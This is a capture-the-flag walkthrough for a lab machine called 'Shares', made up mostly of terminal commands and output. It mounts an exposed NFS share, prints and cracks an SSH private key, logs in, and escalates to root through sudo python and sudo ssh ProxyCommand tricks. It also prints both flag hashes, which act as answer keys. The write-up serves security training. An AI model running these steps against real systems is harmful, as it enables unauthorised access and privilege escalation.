Tasks
NMAP ENUM
kali@kali:~/cyberseclabs$ sudo nmap -p- 172.31.1.7 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 09:49 EDT Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan Nmap scan report for 172.31.1.7 Host is up (0.10s latency). Not shown: 65526 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 111/tcp open rpcbind 2049/tcp open nfs 27853/tcp open unknown -> ssh 34971/tcp open unknown 36663/tcp open unknown 50727/tcp open unknown 56401/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 621.71 seconds
RPC ENUM
kali@kali:~/cyberseclabs$ mkdir /tmp/amir kali@kali:~/cyberseclabs$ sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir [sudo] password for kali:kali kali@kali:~/cyberseclabs$ cd /tmp/amir kali@kali:/tmp/amir$ ls -la total 40 drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 . drwxrwxrwt 14 root root 4096 Jun 25 10:01 .. -rw-r--r-- 1 kali kali 0 Apr 2 11:46 .bash_history -rw-r--r-- 1 kali kali 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 kali kali 3786 Apr 2 11:46 .bashrc drw-r--r-- 2 kali kali 4096 Apr 2 10:44 .cache drw-r--r-- 3 kali kali 4096 Apr 2 10:44 .gnupg -rw-r--r-- 1 kali kali 807 Apr 4 2018 .profile drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .ssh -rw-r--r-- 1 kali kali 0 Apr 2 10:47 .sudo_as_admin_successful -rw-r--r-- 1 kali kali 7713 Apr 2 11:43 .viminfo kali@kali:/tmp/amir$ cd .ssh kali@kali:/tmp/amir/.ssh$ ls -la total 24 drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 . drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 .. -r-------- 1 kali kali 393 Apr 2 11:12 authorized_keys -r-------- 1 kali kali 1766 Apr 2 11:11 id_rsa -rw-r--r-- 1 kali kali 1766 Apr 2 11:20 id_rsa.bak -r-------- 1 kali kali 393 Apr 2 11:11 id_rsa.pub
kali@kali:/tmp/amir/.ssh$ cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,8D55B7449F8965162DA3B7F2F017FC21 2lI1tgSF61MjFg2Er22GWr9hImJbuZ01I556yFoLAGNj/95ZB2H8Er9u8wfMgr8z uB8Yuw2GmO0jJguQ4CK36kDLT/hpG5AW5WfHASzePHx58Ol2hrH+2e5IAoIwcVmi bFN3zIYYCznn6bIvRaqwkuxaD01EG8IPxgAvm0Nr3sP539wngplyf7/+xqvPyT18 jT058FEMPFmeb+V0MHczlNWOW6wrGnxQAea2ON+IUwiSsTVSLv4QLGVWF8Lcualy t4+4Kr47gdlxRh9HcNDztfIztimMdGp8AdV5z4KDKyL6FUVfmZqC2nxhbFUKtF7k su7qHGpV9p9Pkglx+/rUq9NeifFcRGrhsOWctUXmWJ7BbmrqFgw1+X8ui6A/uttE R8hEblI4obffLnGDrAO4wuH+qtA2oelwwjl/JxyqwbGH4RGAW/4AseqDzQ6RpfgQ Sq8wBPb5MMp2ZKEzEl8qcWcwS1FCGz/VPHpnEYwfpFlcJ1kpqkiT5gmNrDFauN1m upeSS7T5iAeHHmskbHJfNNSGYjSbTRzCSFlq2vCNXGte7jta34YCVucNHBIUR/2y GLrm3CmVYPrjdw0irwDt+uepPfUyQQLhSqiZdbyGiljlUeij5+zJax7tOjlBBjBS Y0rMRwiG8FGDEBbSmDZk30qB3Qb9TQcaqe9Wi/liFuxVyfbukiGW2b65JGbd7R1q Vh6pKw4Hd35iGmVskme7evsSupEMOu9fKsJAkIrQTxadpU8wG2wkp0NTM7fh3aut TDGKorRXOXj+cV6zehjXUYyUTesTMDh9EUVmHuixvIFX8V3w562BV28murByt7I+ ubvmZxjvh51nzpOJa4g61tnj/4OCbhFCEK4nsExh0HS11WeDAvueDauLk2Wgiw/z /yyssrshPiXe/vxYGFJlHelyDaUSwpdrZ0AGzwUutN0rOrh3yS6yTDH2raLSa76y e1bxe+rh2Q/iEhzqa1RbWrg7fA+5FJRLAZdYlaqlEsVt81nw4mdBCpjEbUl19egF xIqogCAilFWvnZQ4f12JPmk0mke84idw76+SdBeof18gGiR3mWn3IyoFLRacMs5N 4zrNBXOGCVVzXCoo88ioYw1I91O57c0vbx8S40SbIevUprphf3VTZlyrRxw2AB/R zclXHN/fEewst2maxauD+32Krm1uvTcCNk3CNre7NwPb6tB0rY3R3E7h2S/MKt0Y eZKbFFmLwnokHqzSI8uIy8wrPj6H9R+wxT0+/KPyi3L7JIbParsHO4flBx1sMCUl jlSNW/3J2ADP7QKA5AyjVcsIbp/aXyeJKCtglRc4Yl8mEmCroe61pCDO0mnatWxF Y9/z6VRC61sjO4T1xYcGFSlVeXANuN8TYR8mUyvruG8OoNQ65RvgxSCRPzFe4EAm xmXIQ4pDW59LSO7PnPdjsGN8eY7xTnG5509DYK6FoUC0T8hjp/wR9ucKDDqQoXpW BM9cM5IPltG+wAlP39EbGMinnqgqDazWAk/wSKo4ieGLnWcNORe7Ti299tImCy0l 8zJWICDbH7bSMYyVPlWBrgUBWQ6xFI55iKdhjhlQdblZI04DoSathKFe+Khjb8bi -----END RSA PRIVATE KEY----- kali@kali:/tmp/amir/.ssh$
CRACK FOR “ID_RSA” PASSPHRASE WITH JOHN
kali@kali:~/cyberseclabs$ python ssh2john.py id_rsa > id_rsa.hash kali@kali:~/cyberseclabs$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status hello6 (id_rsa) 1g 0:00:00:10 DONE (2020-06-25 10:08) 0.09157g/s 1313Kp/s 1313Kc/s 1313KC/sa6_123..*7¡Vamos! Session completed kali@kali:~/cyberseclabs$
SSH CONNECT TO MACHINE WITH ID_RSA
(SSH port different. Port number is 27853)
kali@kali:~/cyberseclabs$ ssh -i id_rsa amir@172.31.1.7 -p 27853 Enter passphrase for key 'id_rsa':hello6 Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jun 25 13:59:46 UTC 2020 System load: 0.0 Processes: 105 Usage of /: 39.2% of 9.78GB Users logged in: 0 Memory usage: 34% IP address for eth0: 172.31.1.7 Swap usage: 0% 21 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jun 25 13:00:51 2020 from 172.31.249.99 amir@shares:~$
access.txt file not include amir files, try
first sudo -l
command
https://gtfobins.github.io/gtfobins/python/#sudo
amir@shares:/tmp$ sudo -l Matching Defaults entries for amir on shares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User amir may run the following commands on shares: (ALL : ALL) ALL (amy) NOPASSWD: /usr/bin/pkexec (amy) NOPASSWD: /usr/bin/python3 amir@shares:/home$ sudo -u amy /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' amy@shares:/home$ ls amir amy amy@shares:/home$ ls -la total 16 drwxr-xr-x 4 root root 4096 Apr 2 15:28 . drwxr-xr-x 24 root root 4096 Apr 2 14:34 .. drwxrwxr-x 5 amir amir 4096 Apr 2 15:43 amir drwxr-xr-- 2 amy amy 4096 Apr 2 15:41 amy amy@shares:/home$ cd amy amy@shares:/home/amy$ ls access.txt amy@shares:/home/amy$ ls access.txt amy@shares:/home/amy$ cat access.txt dc17a108efc49710e2fd5450c492231c
FOR ROOT ACCESS
https://gtfobins.github.io/gtfobins/ssh/#sudo
amy@shares:/home/amy$ sudo -l Matching Defaults entries for amy on shares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User amy may run the following commands on shares: (ALL) NOPASSWD: /usr/bin/ssh amy@shares:/home/amy$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x # id uid=0(root) gid=0(root) groups=0(root) # whoami root # bash root@shares:/home/amy# cd /root root@shares:/root# ls -la total 28 drwx------ 3 root root 4096 Apr 2 15:39 . drwxr-xr-x 24 root root 4096 Apr 2 14:34 .. -rw------- 1 root root 78 Apr 2 15:46 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 2 root root 4096 Apr 2 14:43 .ssh -rw-r--r-- 1 root root 33 Apr 2 15:39 system.txt root@shares:/root# cat system.txt b910aca7fe5e6fcb5b0d1554f66c1506 root@shares:/root#
Author – Puckiestyle